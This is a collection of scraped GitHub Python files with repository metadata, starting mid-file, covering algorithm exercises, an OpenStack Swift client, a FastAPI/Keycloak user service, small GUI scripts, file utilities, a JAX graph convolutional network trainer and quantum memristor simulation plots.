1\n \n if D < 0 :\n D = 3\n count = 0 \n\n result += 1\n\n elif Filed[current_X+Left[D][0]][current_Y + Left[D][1]] == 1 or check[current_X+Left[D][0]][current_Y + Left[D][1]] == 1 :\n D -= 1\n if D < 0 :\n D = 3\n count += 1\n\n if count == 3 :\n current_X = current_X+Back[D][0]\n current_Y = current_Y+Back[D][1]\n if Filed[current_X][current_Y] == 1 :\n break\n else :\n count = 0 \n \n print(\"current_X ,Y : \" , current_X , current_Y ) \n\nprint(result) ","repo_name":"YuHyeonGeun-KOR/My-Algorithm-Journey","sub_path":"This is cote/Chapter 4.Implementation/gamedevelop.py","file_name":"gamedevelop.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12933847143","text":"\"\"\"Most simple integration testing.\"\"\"\nimport unittest\nimport uuid\nimport tempfile\nimport shutil\nimport os\nimport mock\n\nfrom ctshed import get_tool_options, install\n\n\ndef random_namespace():\n return uuid.uuid4().hex[:7]\n\n\nclass TestBasic(unittest.TestCase):\n def setUp(self):\n self.tmp_dir = tempfile.mkdtemp()\n\n def tearDown(self):\n shutil.rmtree(self.tmp_dir)\n\n @mock.patch('ctshed.utils.run_docker_build')\n def test_tool_namespace(self, docker_build):\n cli_options = {\n 'source': 'biocontainers/blast:2.2.31',\n 'cmd': None,\n 'packages': None,\n 'path': self.tmp_dir,\n }\n namespace = random_namespace()\n options = get_tool_options(namespace, cli_options)\n executable_path = install(namespace, options)\n self.assertTrue(docker_build.called)\n self.assertTrue(os.path.exists(executable_path))\n\n @mock.patch('ctshed.utils.run_docker_build')\n def test_cmd_namespace(self, docker_build):\n cli_options = {\n 'cmd': 'curl',\n 'packages': 'curl',\n 'path': self.tmp_dir,\n }\n namespace = random_namespace()\n options = get_tool_options(namespace, cli_options)\n executable_path = install(namespace, options)\n self.assertTrue(docker_build.called)\n self.assertTrue(os.path.exists(executable_path))\n","repo_name":"kkarolis/ctshed","sub_path":"tests/integration/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"19760564047","text":"from yakumo import base\nfrom yakumo.constant import UNDEF\nfrom yakumo import mapper\nfrom yakumo import utils\n\n\nATTRIBUTE_MAPPING = [\n ('name', 'name', mapper.Noop),\n ('content_disposition', 'content-disposition', mapper.Noop),\n ('content_encoding', 'content-encoding', mapper.Noop),\n ('content_type', 'content-type', mapper.Noop),\n ('delete_at', 'x-delete-at', mapper.DateTime),\n ('delete_after', 'x-delete-after', mapper.IntStr),\n ('etag', 'etag', mapper.Noop),\n ('if_none_match', 'if-none-match', mapper.Noop),\n ('modified_at', 'last-modified', mapper.DateTime),\n ('object_count', 'x-container-object-count', mapper.IntStr),\n ('object_manifest', 'x-object-manifest', mapper.Noop),\n ('size', 'content-length', mapper.IntStr),\n ('static_large_object', 'x-static-large-object', mapper.Noop),\n ('timestamp', 'x-timestamp', mapper.FloatStr),\n ('trans_id', 'x-trans-id', mapper.Noop),\n ('trans_id_extra', 'x-trans-id-extra', mapper.Noop),\n ('metadata', 'metadata', mapper.Noop),\n ('data', 'data', mapper.Noop),\n]\n\n\nclass Resource(base.SwiftV1Resource):\n \"\"\"resource class for containers on Object Storage V1 API\"\"\"\n\n def update(self, content_disposition=UNDEF, content_encoding=UNDEF,\n content_type=UNDEF, delete_after=UNDEF, delete_at=UNDEF,\n trans_id_extra=UNDEF, metadata=UNDEF):\n \"\"\"\n Update metadata of an object\n\n @keyword content_disposition: Specifies the override behavior for the\n browser\n @type content_disposition: str\n @keyword content_encoding: Content-Encoding metadata\n @type content_encoding: str\n @keyword content_type: MIME type for the object\n @type content_type: str\n @keyword delete_after: Seconds after which the system removes the\n object\n @type delete_after: int\n @keyword delete_at: When the system removes the object\n @type delete_at: datetime.datetime\n @keyword trans_id_extra: Extra transaction information\n @type trans_id_extra: str\n @keyword metadata: Key-value style metadata\n @type metadata: dict\n @rtype: None\n \"\"\"\n super(Resource, self).update(\n content_disposition=content_disposition,\n content_encoding=content_encoding,\n content_type=content_type,\n delete_at=delete_at,\n delete_after=delete_after,\n trans_id_extra=trans_id_extra,\n metadata=metadata)\n\n def replace(self, content_disposition=UNDEF, content_encoding=UNDEF,\n content_type=UNDEF, etag=UNDEF, if_none_match=UNDEF,\n delete_after=UNDEF, delete_at=UNDEF, object_manifest=UNDEF,\n size=UNDEF, trans_id_extra=UNDEF, metadata=UNDEF, file=None):\n \"\"\"\n Replace an object\n\n @keyword content_disposition: Specifies the override behavior for the\n browser\n @type content_disposition: str\n @keyword content_encoding: Content-Encoding metadata\n @type content_encoding: str\n @keyword content_type: MIME type for the object\n @type content_type: str\n @keyword etag: MD5 checksum of the object\n @type etag: str\n @keyword if_none_match: If-None-Match header\n @type if_none_match: str\n @keyword delete_after: When the system removes the object\n @type delete_after: datetime.datetime\n @keyword delete_at: When the system removes the object\n @type delete_at: datetime.datetime\n @keyword object_manifest: Dynamic large object manifest object\n @type object_manifest: str\n @keyword size: Object size\n @type size: int\n @keyword trans_id_extra: Extra transaction information\n @type trans_id_extra: str\n @keyword metadata: Key-value style metadata\n @type metadata: dict\n @keyword file: File name to upload\n @type file: str\n @rtype: None\n \"\"\"\n old_attrs = self.get_attrs()\n new_attrs = dict(\n content_disposition=content_disposition,\n content_encoding=content_encoding,\n content_type=content_type,\n object_manifest=object_manifest,\n delete_after=delete_after,\n delete_at=delete_at,\n etag=etag,\n if_none_match=if_none_match,\n size=size,\n trans_id_extra=trans_id_extra,\n metadata=metadata)\n for key, value in new_attrs.items():\n if value is UNDEF:\n continue\n new_attrs[key] = old_attrs[key]\n\n self._manager.create(self._id, file=file, **new_attrs)\n self.reload()\n\n def copy(self, container=UNDEF, name=UNDEF):\n \"\"\"\n Copy an object\n\n @param container: Destination container\n @type container: swift.container.Resource\n @param name: Destination object name\n @type name: str\n @return: New object\n @rtype: swift.v1.file_object.Resource\n \"\"\"\n if container is UNDEF:\n container = self._manager.parent_resource\n headers = {\n \"x-copy-from\": \"/%s/%s\" % (\n self._manager.parent_resource.get_id(), self._id),\n }\n self._http.put_raw(container._manager._url_resource_path,\n container.get_id(), name,\n headers=headers)\n return container.object.get_empty(name)\n\n def download(self, file=None):\n \"\"\"\n Download an object into a file\n\n @keyword file: File name to save\n @type file: str\n @rtype: None\n \"\"\"\n self._http.get_file(self._url_resource_path, self._id, file=file)\n\n def set_metadata(self, **metadata):\n \"\"\"\n Update metadata of an object\n\n @keyword metadata: key=value style.\n @type metadata: dict\n @rtype: None\n \"\"\"\n if self.metadata is None:\n self.metadata = {}\n self.metadata.update(metadata)\n self.update()\n\n def unset_metadata(self, *keys):\n \"\"\"\n Delete metadata of an object\n\n @param key: key of the metadata\n @type keys: [str]\n @rtype: None\n \"\"\"\n if self.metadata is None:\n return\n for key in keys:\n if key in self.metadata:\n self.metadata.pop(key)\n self.update()\n\n\nclass Manager(base.SwiftV1SubManager):\n \"\"\"manager class for objects on Object Storage V1 API\"\"\"\n\n resource_class = Resource\n service_type = 'object-store'\n _attr_mapping = ATTRIBUTE_MAPPING\n _has_detail = False\n _url_resource_path = '/%s'\n _json_resource_key = 'object'\n\n def create(self, name, content_disposition=UNDEF, content_encoding=UNDEF,\n content_type=UNDEF, etag=UNDEF, if_none_match=UNDEF,\n delete_after=UNDEF, delete_at=UNDEF, object_manifest=UNDEF,\n size=UNDEF, trans_id_extra=UNDEF, metadata=UNDEF, file=None):\n \"\"\"\n Create an object\n\n @param name: Object name\n @type name: str\n @keyword content_disposition: Specifies the override behavior for the\n browser\n @type content_disposition: str\n @keyword content_encoding: Content-Encoding metadata\n @type content_encoding: str\n @keyword content_type: MIME type for the object\n @type content_type: str\n @keyword etag: MD5 checksum of the object\n @type etag: str\n @keyword if_none_match: If-None-Match header\n @type if_none_match: str\n @keyword delete_after: When the system removes the object\n @type delete_after: datetime.datetime\n @keyword delete_at: When the system removes the object\n @type delete_at: datetime.datetime\n @keyword object_manifest: Dynamic large object manifest object\n @type object_manifest: str\n @keyword size: Object size\n @type size: int\n @keyword trans_id_extra: Extra transaction information\n @type trans_id_extra: str\n @keyword metadata: Key-value style metadata\n @type metadata: dict\n @keyword file: File name to upload\n @type file: str\n @return: Created objects\n @rtype: yakumo.swift.v1.objects.Resource\n \"\"\"\n data = UNDEF\n if file:\n data = utils.gen_chunk(file)\n return super(Manager, self).create(\n name,\n content_disposition=content_disposition,\n content_encoding=content_encoding,\n content_type=content_type,\n object_manifest=object_manifest,\n delete_after=delete_after,\n delete_at=delete_at,\n etag=etag,\n if_none_match=if_none_match,\n size=size,\n trans_id_extra=trans_id_extra,\n metadata=metadata,\n data=data)\n","repo_name":"iliiilililii/python-yakumo","sub_path":"yakumo/swift/v1/file_object.py","file_name":"file_object.py","file_ext":"py","file_size_in_byte":8869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"16035909353","text":"class Matrix(object):\n \n # upon creation the matrix object expects a 2 dimensional list\n # A = Matrix([[1,2,3], [3,4,5]])\n def __init__(self, m):\n self.m = m\n \n def add(self, n):\n \n # if n is an int or a float\n if isinstance(n, int) or isinstance(n, float):\n for i in range(len(self.m)):\n for j in range(len(self.m[i])):\n self.m[i][j] += n\n \n # if is another matrix\n if isinstance(n, Matrix):\n for i in range(len(self.m)):\n for j in range(len(self.m[i])):\n self.m[i][j] += n.m[i][j]\n \n \n # return row n\n def getRow(self, n):\n return self.m[n]\n \n \n # return column n\n def getColl(self, n):\n c = []\n for i in self.m:\n c.append(i[n])\n return c\n \n \n # return the dot product for two vectors\n def dotVec(self, v1, v2):\n multSum = 0\n for i in range(len(v1)):\n multSum += v1[i] * v2[i]\n \n return multSum\n \n \n # calculate the dot product of this matrix with matrix n\n # return the result as a new matrix\n # the number of columns of this matrix must be equal to the number of rows of matrix n\n def dot(self, n):\n l = []\n lm = []\n numRows = len(self.m)\n numcols = len(n.m[0])\n \n # do the math\n for i in range(numRows):\n r = self.getRow(i)\n for j in range(numcols):\n c = n.getColl(j)\n l.append(self.dotVec(r, c))\n \n # turn l into a Matrix\n ind = 0\n for i in range(numRows):\n lm.append(l[ind : ind + numcols])\n ind += numColls\n \n return Matrix(lm)\n","repo_name":"hanswillem/machine_learning","sub_path":"matrix_class.py","file_name":"matrix_class.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27650812935","text":"\"\"\"_summary_\r\nRenamerInitHyphen.py removes initial hyphen of the file. Searches subfolders.\r\n\"\"\"\r\n\r\nimport os\r\nimport re\r\n\r\npath = input(\"(RenamerInitHyphen.py): \")\r\n\r\n# only file extensions in this list will be renamed\r\nexts = ['.docx', '.doc', '.odt', '.pptx', '.odp', '.png', '.jpg', '.jfif', '.jpeg', '.gif', '.bmp', '.pdf', '.xlsx', 'xls', '.txt']\r\n\r\n# determines if the previous conditional statements were executed\r\nexecuted = False\r\nqueried = False\r\n\r\n# ends range(0,2)\r\nchanges = False\r\n\r\nfor i in range(0,2):\r\n if queried and not changes:\r\n break\r\n for root, dirs, files in os.walk(path):\r\n os.chdir(root)\r\n end = 0\r\n for filename in os.listdir(root):\r\n file_ext = os.path.splitext(filename)[1]\r\n if re.match(r'^-', filename) and file_ext != '':\r\n new_filename = re.sub(r'^-', '', filename, count=1)\r\n if queried:\r\n os.rename(filename, new_filename)\r\n print(filename + \" to \" + new_filename)\r\n if not queried:\r\n query = input(\"Accept Changes [ACCEPT]: \")\r\n queried = True\r\n if query.upper() == 'ACCEPT':\r\n print(\"Changes accepted\")\r\n changes = True\r\n else:\r\n print(\"Changes not accepted\")\r\n changes = False","repo_name":"WorkNicolas/Filename-Renamer","sub_path":"src/RenamerInitHyphen.py","file_name":"RenamerInitHyphen.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1429984134","text":"from fastapi import HTTPException\nfrom starlette.responses import JSONResponse\nfrom iteration_utilities import unique_everseen\n\nfrom starlette.status import (\n HTTP_200_OK,\n HTTP_201_CREATED,\n HTTP_204_NO_CONTENT\n)\n\nfrom ..services import (\n KeyCloakService,\n AuthService\n)\n\nfrom ..utils import build_response\n\nfrom ..db import (\n MongoDB,\n get_client\n)\n\nfrom ..models.user_models import (\n OutUser,\n User,\n MongoUser,\n UpdateUser\n)\n\n\nclass UserService:\n def __init__(self):\n super().__init__()\n self._db = MongoDB(get_client())\n self._keycloak_service = KeyCloakService()\n self._auth_service = AuthService()\n\n async def create_new_user(self, user: User):\n user_dict: dict = user.dict()\n user_id: str = await self._keycloak_service.create_user(user_dict)\n user_dict.update({'user_id': user_id})\n user_dict.pop('password')\n\n _ = await self._db.insert_user(MongoUser(**user_dict).dict())\n\n return await build_response(HTTP_201_CREATED, msg='New user created')\n\n async def get_current_user(self, token: str):\n user_dict: dict = await self._auth_service.check_active_token(token)\n return await build_response(data=OutUser(**user_dict).dict())\n\n async def update_user(self, user: UpdateUser, token: str):\n current_data: dict = await self._auth_service.check_active_token(token)\n _ = await self._keycloak_service.update_user(user, current_data.get('user_id'))\n\n update_user: dict = user.dict(exclude_unset=True)\n\n updated_user = await self._db.update_user(update_user, current_data.get('user_id'))\n return await build_response(data=OutUser(**updated_user).dict())\n\n # async def delete_user(self, token: str):\n # user_dict: dict = await self._auth_service.check_active_token(token)\n # user = await self._db.delete_user(user_dict['email'])\n\n # if user:\n # return await build_response(msg='Removed user successfully')\n\n # raise HTTPException(\n # status_code=HTTP_204_NO_CONTENT,\n # detail='Remove user failed'\n # )\n","repo_name":"kumaF/fastapi-keycloak-boilerplate","sub_path":"app/services/user_service.py","file_name":"user_service.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"25616244881","text":"import tkinter as tk\nfrom grafik.ball import Ball\n\n\ndef add_ball(event=None):\n Ball.add(my_canvas)\n\n\ndef remove_ball(event=None):\n Ball.remove()\n\n\ndef refresh():\n [ball.draw() for ball in Ball.get_balls()]\n my_canvas.after(25, refresh)\n\n\nwindow = tk.Tk()\nwindow.bind(\"\", add_ball)\nwindow.bind(\"\", remove_ball)\n\nlabel = tk.Label(window, text=\"Gravity\")\nmy_canvas = tk.Canvas(window, height=1500, width=1500, bg=\"#FFFFFF\")\n\n[Ball.add(my_canvas) for i in range(3)]\n[my_canvas.after(25, refresh) for ball in Ball.get_balls()]\n\nlabel.pack()\nmy_canvas.pack()\n\nwindow.mainloop()\n","repo_name":"tmontel/tkball","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72153375235","text":"import os\n\nfilename = str(input(\"Nome do arquivo.txt: \"))\nf=open(\"/home/usuario/Documentos/GitHub/cursos/Arquivos_Curso_Python/\"+filename,\"at\")\n\nos.system(\"clear\")\ntxt=input(\"Digite um texto: \")\nf.write(txt+\"\\n\")\n\nf.close()\n","repo_name":"maledicente/cursos","sub_path":"Arquivos_Curso_Python/aula44.py","file_name":"aula44.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1857683375","text":"import os\nimport re\nimport datetime as dt\n\nfrom env.running_env import milestone_base, image_base, exp_base, log_base\nfrom utils.objectIO import fetch_file_name, dir_files, remove_files\n\n\nclass FileCleaner:\n ERROR_MESS1 = \"Do not search date to satisfy the regular(FileCleaner.pattern).\"\n ERROR_MESS2 = \"Do not search date to satisfy the regular(FileCleaner.data_pattern).\"\n\n def __init__(self, remain_days: int, year: int = 2023):\n self.curt_year = year\n self.remain = remain_days\n self.format_time = \"%Y.%m.%d\"\n # 匹配两种文件格式,一种是日志,一种��普通带日期文件,都只提取日期\n self.pattern = re.compile(r\"---([\\d\\.]+)\\.[\\w]+$|^\\d+\\.([\\d\\.]+)_\", re.MULTILINE)\n self.data_pattern = re.compile(r\"[\\d\\.]+\", re.MULTILINE)\n\n def day_consumed(self, date: str) -> int:\n curt_date_str = dt.datetime.now().strftime(self.format_time)\n curt_date = dt.datetime.strptime(curt_date_str, self.format_time).date()\n date = dt.datetime.strptime(date, self.format_time).date()\n days = (curt_date - date).days\n return days\n\n def fetch_date(self, file_name: str) -> str:\n date = None\n match = self.pattern.search(file_name)\n assert match, self.ERROR_MESS1\n for group in match.groups():\n if group:\n if self.data_pattern.match(group):\n date = group\n assert date, self.ERROR_MESS2\n return f\"{self.curt_year}.{date}\"\n\n def find_files(self) -> list:\n all_files = []\n files_path = []\n files_base = [milestone_base, log_base, image_base, exp_base]\n for base in files_base:\n all_files.extend(dir_files(base))\n\n for f_path in all_files:\n file_name = fetch_file_name(f_path)\n if self.pattern.search(file_name):\n if self.day_consumed(self.fetch_date(file_name)) > self.remain:\n files_path.append(f_path)\n return files_path\n\n def clear_files(self):\n to_del = self.find_files()\n remove_files(to_del)\n","repo_name":"Wolfsion/FedLA","sub_path":"utils/Cleaner.py","file_name":"Cleaner.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40955784212","text":"from translate import Translator\nimport translate\nimport PySimpleGUI as sg #importação das bibliotecas necessárias\n\nlayout = [ #criação do layout\n [sg.Text('Frase/Termo:'), sg.Input('', key='entrada'), sg.Button('Traduzir')],\n #na 1 linha cria-se um texto padrão, uma caixa de entrada de texto chaveada como \"entrada\", e um botão\n [sg.Text('', key='traducao')]\n #na linha 2 cria-se um texto padrão ainda em branco, chaveado como \"tradução\"\n]\n\nwindow = sg.Window('Tradutor Pt-Br -> En', layout=layout)\n#criação da janela com titulo e layout\nt = Translator(from_lang='pt-br', to_lang='english')\n#criação da variável de tradução, com os parâmetros de tradução\n\nwhile True: #laço de leitura da janela\n event, values = window.read() #leitura dos eventos e valores da janela\n if event == sg.WINDOW_CLOSED: #laço para o caso do botão fechar for clicado, o laço quebra\n break\n if event == 'Traduzir': #criação do evento ao clicar no botão \"Traduzir\"\n traducao = t.translate(values['entrada'])\n #a variável \"t\" irá traduzir o texto e inserir em outra variável\n window['traducao'].update(f'Tradução: {traducao}')\n #na janela será atualizada a mensagem na chave \"traducao\" para o conteudo traduzido\n\n #fim do código\n","repo_name":"MateusAtaide/projetos_python","sub_path":"Tradutor_Pt-En/tradutor_Pt-En.py","file_name":"tradutor_Pt-En.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32217671668","text":"import argparse\nimport time\n\nimport numpy\nimport jax\nimport jax.numpy as np\nfrom jax import jit, grad, random\nfrom jax.experimental import optimizers\n\nfrom utils import load_data\nfrom models import GCN\n\n@jit\ndef loss(params, batch):\n \"\"\"\n The idxes of the batch indicate which nodes are used to compute the loss.\n \"\"\"\n inputs, targets, adj, is_training, rng, idx = batch\n preds = predict_fun(params, inputs, adj, is_training=is_training, rng=rng)\n ce_loss = -np.mean(np.sum(preds[idx] * targets[idx], axis=1))\n l2_loss = 5e-4 * optimizers.l2_norm(params)**2 # tf doesn't use sqrt\n return ce_loss + l2_loss\n\n@jit\ndef accuracy(params, batch):\n inputs, targets, adj, is_training, rng, idx = batch\n target_class = np.argmax(targets, axis=1)\n predicted_class = np.argmax(predict_fun(params, inputs, adj, is_training=is_training, rng=rng), axis=1)\n return np.mean(predicted_class[idx] == target_class[idx])\n\n@jit\ndef loss_accuracy(params, batch):\n inputs, targets, adj, is_training, rng, idx = batch\n preds = predict_fun(params, inputs, adj, is_training=is_training, rng=rng)\n target_class = np.argmax(targets, axis=1)\n predicted_class = np.argmax(preds, axis=1)\n ce_loss = -np.mean(np.sum(preds[idx] * targets[idx], axis=1))\n acc = np.mean(predicted_class[idx] == target_class[idx])\n return ce_loss, acc\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--seed', type=int, default=0)\n parser.add_argument('--hidden', type=int, default=16)\n parser.add_argument('--epochs', type=int, default=200)\n parser.add_argument('--dropout', type=float, default=0.5)\n parser.add_argument('--lr', type=float, default=0.01)\n parser.add_argument('--early_stop', type=int, default=10)\n parser.add_argument('--dataset', type=str, default='cora')\n parser.add_argument('--sparse', dest='sparse', action='store_true')\n parser.add_argument('--no-sparse', dest='sparse', action='store_false')\n parser.set_defaults(sparse=True)\n args = parser.parse_args()\n\n # Load data\n adj, features, labels, idx_train, idx_val, idx_test = load_data(args.dataset, sparse = args.sparse)\n\n rng_key = random.PRNGKey(args.seed)\n dropout = args.dropout\n step_size = args.lr\n hidden = args.hidden\n num_epochs = args.epochs\n n_nodes = features.shape[0]\n n_feats = features.shape[1]\n early_stopping = args.early_stop\n\n init_fun, predict_fun = GCN(nhid=hidden, \n nclass=labels.shape[1],\n dropout=dropout,\n sparse=args.sparse)\n input_shape = (-1, n_nodes, n_feats)\n rng_key, init_key = random.split(rng_key)\n _, init_params = init_fun(init_key, input_shape)\n\n opt_init, opt_update, get_params = optimizers.adam(step_size)\n\n @jit\n def update(i, opt_state, batch):\n params = get_params(opt_state)\n return opt_update(i, grad(loss)(params, batch), opt_state)\n\n opt_state = opt_init(init_params)\n\n print(\"\\nStarting training...\")\n val_values = []\n for epoch in range(num_epochs):\n start_time = time.time()\n batch = (features, labels, adj, True, rng_key, idx_train)\n opt_state = update(epoch, opt_state, batch)\n epoch_time = time.time() - start_time\n\n params = get_params(opt_state)\n eval_batch = (features, labels, adj, False, rng_key, idx_val)\n train_batch = (features, labels, adj, False, rng_key, idx_train)\n train_loss, train_acc = loss_accuracy(params, train_batch)\n val_loss, val_acc = loss_accuracy(params, eval_batch)\n val_values.append(val_loss.item())\n print(f\"Iter {epoch}/{num_epochs} ({epoch_time:.4f} s) train_loss: {train_loss:.4f}, train_acc: {train_acc:.4f}, val_loss: {val_loss:.4f}, val_acc: {val_acc:.4f}\")\n\n # new random key at each iteration, othwerwise dropout uses always the same mask \n rng_key, _ = random.split(rng_key)\n if epoch > early_stopping and val_values[-1] > numpy.mean(val_values[-(early_stopping+1):-1]):\n print(\"Early stopping...\")\n break\n \n # now run on the test set\n test_batch = (features, labels, adj, False, rng_key, idx_test)\n test_acc = accuracy(params, test_batch)\n print(f'Test set acc: {test_acc}')","repo_name":"gcucurull/jax-gcn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"25440509809","text":"#!/usr/bin/env python3\n\n\n#全局变量在整个py文件中声明,全局范围内可以使用\n#在函数内部,如果局部变量与全局变量变量名一样,则优先调用局部变量。\n#如果想在函数内部改变全局变量,需要在前面加上global关键字\nvalue = 100\ndef test():\n value = 250 #与全局变量同名,不是修改全局变量,而是创建局部变量\n print(value)\n \ndef test1():\n global value\n value = 1000 #修改的是全局变量\n print(value)\n \n\n#函数内创建全局变量,在变量名前面加上global\ndef test2():\n global num\n num = 123\n print(num)\n \n#回调函数中创建的局部变量,要想下次回调继续使用,要声明为全局变量\n\n\n\nif __name__ == \"__main__\":\n test()\n test1() #函数体内修改全局变量\n test2() #函数体内创建全局变量\n print(num) \n\n","repo_name":"plainchan/python_proj","sub_path":"全局变量与局部变量.py","file_name":"全局变量与局部变量.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71423244353","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport qutip as qp\r\n\r\nfrom QM_evol import memristor_evolution as me\r\n\r\n# Load data\r\nData_best = pd.read_csv(r'data\\best_ff_75percentile.csv')\r\nData_worst = pd.read_csv(r'data\\worst_ff_25percentile.csv')\r\n\r\n# single quantum memristor\r\nData_sqm = Data_best.loc[(Data_best['C12'] == 0) & (Data_best['L12'] == 0)]\r\nidx_sqm = Data_sqm['Formfactor_1'].idxmax() # index of the row with highest form factor for single quantum memristor\r\nparameters_sqm = [[np.pi/2, Data_sqm['theta'].iloc[idx_sqm]], # theta_1\r\n [np.pi/2, Data_sqm['theta'].iloc[idx_sqm]], # theta_2\r\n Data_sqm['lambda_'].iloc[idx_sqm]] # lambda\r\n\r\n# Data best case\r\nidx_best = Data_best['Formfactor_1'].idxmax()\r\nparameters_best = [[np.pi/2, Data_best['theta'].iloc[idx_best]], # theta_1\r\n [np.pi/2, Data_best['theta'].iloc[idx_best]], # theta_2\r\n Data_best['lambda_'].iloc[idx_best], # lambda\r\n Data_best['C12'].iloc[idx_best], # C12\r\n Data_best['L12'].iloc[idx_best]] # L12\r\n\r\n# Data worst case\r\nidx_worst = Data_worst['Formfactor_1'].idxmin()\r\nparameters_worst = [[np.pi/2, Data_best['theta'].iloc[idx_worst]], # theta_1\r\n [np.pi/2, Data_best['theta'].iloc[idx_worst]], # theta_2\r\n Data_best['lambda_'].iloc[idx_worst], # lambda\r\n Data_best['C12'].iloc[idx_worst], # C12\r\n Data_best['L12'].iloc[idx_worst]] # L12\r\n\r\n\r\n# Calculate the evolution with the best parameters\r\nRho_sqm, Results_sqm, Params_sqm = me.Coupled_memristor_evolution(*parameters_sqm, n_osci=10) # evolves two identical and uncoupled quantum memristors\r\n# equivalent to evolving a single quantum memristor\r\n\r\n# Set form factor, voltage and current into different variables\r\nFF_sqm, V_aux_sqm, Iqp_aux_sqm = Results_sqm\r\nt_sqm, indices_sqm, params_sqm = Params_sqm\r\n\r\n# Put the best parameters into separate variables\r\nomega1_sqm = params_sqm['omega1']\r\nomega2_sqm = params_sqm['omega2']\r\nI1_0_sqm = params_sqm['I1_0']\r\nI2_0_sqm = params_sqm['I2_0']\r\nV1_0_sqm = params_sqm['V1_0']\r\nV2_0_sqm = params_sqm['V2_0']\r\ntimescale_sqm = params_sqm['timescale']\r\n\r\n\r\n# Calculate evolution for coupled quantum memristors\r\nn_oscillations = 20\r\nRho_best, Results_best, Params_best = me.Coupled_memristor_evolution(*parameters_best, n_osci=n_oscillations) \r\nRho_worst, Results_worst, Params_worst = me.Coupled_memristor_evolution(*parameters_worst, n_osci=n_oscillations) \r\n\r\n# Best\r\nFF_best, V_aux_best, Iqp_aux_best = Results_best\r\nt_best, indices_best, params_best = Params_best\r\n\r\nomega1_best = params_best['omega1']\r\nomega2_best = params_best['omega2']\r\nI1_0_best = params_best['I1_0']\r\nI2_0_best = params_best['I2_0']\r\nV1_0_best = params_best['V1_0']\r\nV2_0_best = params_best['V2_0']\r\ntimescale_best = params_best['timescale']\r\n\r\n# Worst\r\nFF_worst, V_aux_worst, Iqp_aux_worst = Results_worst\r\nt_worst, indices_worst, params_worst = Params_worst\r\n\r\nomega1_worst = params_worst['omega1']\r\nomega2_worst = params_worst['omega2']\r\nI1_0_worst = params_worst['I1_0']\r\nI2_0_worst = params_worst['I2_0']\r\nV1_0_worst = params_worst['V1_0']\r\nV2_0_worst = params_worst['V2_0']\r\ntimescale_worst = params_worst['timescale']\r\n\r\n\r\n# Calculate concurrence\r\nFF_1_best = FF_best[0]\r\nFF_2_best = FF_best[1]\r\n\r\nFF_1_worst = FF_worst[0]\r\nFF_2_worst = FF_worst[1]\r\n\r\n\r\nconcurrence_best = np.zeros(len(Rho_best.states))\r\nconcurrence_worst = np.zeros(len(Rho_worst.states))\r\n\r\nfor t1, state in enumerate(Rho_best.states):\r\n concurrence_best[t1] = qp.concurrence(state)\r\n \r\nfor t1, state in enumerate(Rho_worst.states):\r\n concurrence_worst[t1] = qp.concurrence(state)\r\n\r\n\r\n# Generate figures\r\n# Fig 1\r\nfig1 = plt.figure(1)\r\n\r\nax_sqm1 = fig1.add_subplot(1,2,1)\r\nax_sqm2 = fig1.add_subplot(1,2,2)\r\n\r\ncount = 10*500\r\nax_sqm1.plot(V_aux_sqm[0][0:count]/V1_0_sqm, Iqp_aux_sqm[0][0:count]/I1_0_sqm,\r\n lw = 1.5, color='black')\r\nax_sqm1.set_xlabel(r'$V/V_0$', fontsize = 20, labelpad = 10)\r\nax_sqm1.set_ylabel(r'$I/I_0$', fontsize = 20, labelpad = 10)\r\nax_sqm1.tick_params(axis='both', which='major', labelsize=15, width = 2, length=4)\r\n\r\nax_sqm2.plot(t_sqm[indices_sqm[1:]]/timescale_sqm, FF_sqm[0], lw=1, ls='--', marker='o')\r\nax_sqm2.set_ylim([0, 0.35])\r\nax_sqm2.set_xlabel(r'$t/T$', fontsize = 25, labelpad = 10)\r\nax_sqm2.set_ylabel(r'$\\mathcal{F}$', fontsize = 25, labelpad = 10)\r\nax_sqm2.tick_params(axis='both', which='major', labelsize=20, width = 2, length=4)\r\n\r\nplt.tight_layout()\r\n\r\n\r\n# ---- Fig2 ----\r\nfig3 = plt.figure(3)\r\n\r\nax31 = fig3.add_subplot(1,2,1)\r\nax32 = fig3.add_subplot(1,2,2)\r\n\r\n# best case \r\ncount = 10*500\r\nax31.plot(V_aux_best[0][0:count]/V1_0_best, Iqp_aux_best[0][0:count]/I1_0_best,\r\n lw = 1.5, label='optimal', color='black')\r\nax31.set_title('optimal', fontsize = 20)\r\nax31.set_xlabel(r'$V/V_0$', fontsize = 20, labelpad = 10)\r\nax31.set_ylabel(r'$I/I_0$', fontsize = 20, labelpad = 10)\r\nax31.tick_params(axis='both', which='major', labelsize=15, width = 2, length=4)\r\n\r\n\r\n# worst case 